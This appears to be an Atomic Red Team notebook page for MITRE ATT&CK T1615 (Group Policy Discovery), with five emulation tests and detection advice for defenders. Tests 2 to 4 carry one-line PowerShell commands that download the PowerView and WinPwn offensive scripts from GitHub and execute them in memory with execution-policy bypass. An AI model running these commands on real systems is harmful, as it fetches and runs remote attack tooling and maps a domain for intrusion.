# T1615 - Group Policy Discovery
Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predicable network path <code>\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\</code>.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)

Adversaries may use commands such as <code>gpresult</code> or various publicly available PowerShell functions, such as <code>Get-DomainGPO</code> and <code>Get-DomainGPOLocalGroup</code>, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.

## Atomic Tests

### Atomic Test #1 - Display group policy information via gpresultUses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information for a remote user and computer
The /z parameter displays all available information about Group Policy. More parameters can be found in the linked Microsoft documentation
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult
https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/
Turla has used the /z and /v parameters: https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
gpresult /z
```

In [ ]:
Invoke-AtomicTest T1615 -TestNumbers 1

### Atomic Test #2 - Get-DomainGPO to display group policy information via PowerViewUse PowerView to Get-DomainGPO This will only work on Windows 10 Enterprise and A DC Windows 2019.**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://github.com/BC-SECURITY/Empire/blob/86921fbbf4945441e2f9d9e7712c5a6e96eed0f3/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-DomainGPO"```

In [ ]:
Invoke-AtomicTest T1615 -TestNumbers 2

### Atomic Test #3 - WinPwn - GPOAuditCheck domain Group policies for common misconfigurations using Grouper2 via GPOAudit function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
GPOAudit -noninteractive -consoleoutput```

In [ ]:
Invoke-AtomicTest T1615 -TestNumbers 3

### Atomic Test #4 - WinPwn - GPORemoteAccessPolicyEnumerate remote access policies through group policy using GPORemoteAccessPolicy function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
GPORemoteAccessPolicy -consoleoutput -noninteractive```

In [ ]:
Invoke-AtomicTest T1615 -TestNumbers 4

### Atomic Test #5 - MSFT Get-GPO Cmdlet
The Get-GPO cmdlet gets one Group Policy Object (GPO) or all the GPOs in a domain. Tested on Windows Server 2019 as a domain user with computer joined to domain. Reference: https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps
**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Add Rsat.ActiveDirectory.DS
##### Check Prereq Commands:
```powershell
if(Get-WindowsCapability -Online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0 | Where-Object { $_.State -eq 'Installed' }){ exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
Add-WindowsCapability -online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0
```
##### Description: Add Rsat.GroupPolicy.Management.Tools ###Two RSAT Modules needed for this to work on Win10, WinServer 2019 works by default. This will take a long time (almost 2 minutes) to install RSAT Manually###.
##### Check Prereq Commands:
```powershell
if(Get-WindowsCapability -Online -Name Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0 | Where-Object { $_.State -eq 'Installed' }){ exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
Add-WindowsCapability -online -Name Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0
```

In [ ]:
Invoke-AtomicTest T1615 -TestNumbers 5 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Get-GPO -Domain $ENV:userdnsdomain -All >> $env:temp\GPO_Output.txt```

In [ ]:
Invoke-AtomicTest T1615 -TestNumbers 5

#### Cleanup: 
```powershell
del $env:temp\GPO_Output.txt -erroraction silentlycontinue```

In [ ]:
Invoke-AtomicTest T1615 -TestNumbers 5 -Cleanup

## Detection
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.

Monitor for suspicious use of <code>gpresult</code>. Monitor for the use of PowerShell functions such as <code>Get-DomainGPO</code> and <code>Get-DomainGPOLocalGroup</code> and processes spawning with command-line arguments containing <code>GPOLocalGroup</code>.

Monitor for abnormal LDAP queries with filters for <code>groupPolicyContainer</code> and high volumes of LDAP traffic to domain controllers. Windows Event ID 4661 can also be used to detect when a directory service has been accessed.